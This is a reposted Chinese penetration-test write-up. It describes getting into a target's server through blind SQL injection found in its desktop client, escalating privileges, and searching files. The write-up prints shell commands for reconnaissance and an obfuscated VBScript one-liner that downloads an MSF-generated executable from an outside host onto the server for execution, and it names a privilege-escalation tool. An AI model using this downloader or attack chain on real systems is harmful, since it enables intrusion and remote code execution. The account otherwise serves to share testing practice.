安基网 首页 安全 渗透测试 查看内容

等保测评之渗透测试

2020-1-11 12:03| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 得到目标后,先对目标官网进行了一次常规的渗透检测,并没有发现什么突破口,然后又检测了下 APP 然而还是么有什么卵用。在一筹莫展之时发现目标还有 PC 端的软件,果断下载抓包测试一番,成功得到 2 处 SQL 注入漏洞。目标官网:www.xxx.com 软件的URL:sbl-webapi.sss.com 对 sbl-webapi.sss.com 服 ...

得到目标后,先对目标官网进行了一次常规的渗透检测,并没有发现什么突破口,然后又检测了下 APP 然而还是么有什么卵用。
在一筹莫展之时发现目标还有 PC 端的软件,果断下载抓包测试一番,成功得到 2 处 SQL 注入漏洞。

目标官网:www.xxx.com 软件的URL:sbl-webapi.sss.com 对 sbl-webapi.sss.com 服务器进行端口扫描发现存在 1433 和 3389
注入点是降权的 DBA 权限的 盲注,os-shell 交互shell 10分钟一条回显,速度巨慢,经过几天的折腾,曾成功进入过 2 个后台,但是 2 处后台虽然存在任意上传,但是启用的阿里云的 oss ,所以注定图片上传没戏,其他地方也没发现什么突破口。。。
然后想的是寻找绝对路径直接写 shell 反正有交互 shell 嘛。

Shell

dir /S /D c:web.config

复制 文本

使用上方的命令尝试搜索 CDEF 结果并没有搜到目标绝对路径,不过得到这么一个路径:c:inetpubwwwrootLHWeb
使用下方命令确定盘符:

Shell

wmic logicaldisk where DriveType=3 get DeviceID

复制 文本

得到 C、F 2个盘,但是F盘是空的。
尝试往 c:inetpubwwwrootLHWebupload 写 1.txt 测试,访问发现不存在,但是文件又确实写入了,因此判断非绝对路径,但是实在找不到别的路径了。
尝试读取配置文件 type c:inetpubwwwrootLHWebweb.config 然而里面并没有我想要的东西。。。
如果用命令继续翻目录读目录,按照这交互速度,那得折腾到啥时候去。。。其实已经折腾两天多了。。
最后想到个方法成功搞定:

Shell

echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^",wsh.arguments( 0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> d.vbscscript d.vbs http://1.1.1.1/1.exe C:Windowstemp1.exe

复制 文本


通过上方的命令,成功下载了MSF生成的shell.exe到目标服务器,然后执行获取到一个低权限交互shell


然后利用巴西烤肉成功提权


然后快乐的去登陆 3389 ,结果失败,然后把,不得不认清现实,站酷分离.....
尝试 getpass 看看是不是统一的密码,结果失败,没读出来,
好吧好吧,system 权限的交互shell,慢慢折腾吧,经过各种翻文件,最后终于找到了我要的东西:



至此成功搞定~



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6779759586569093640/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部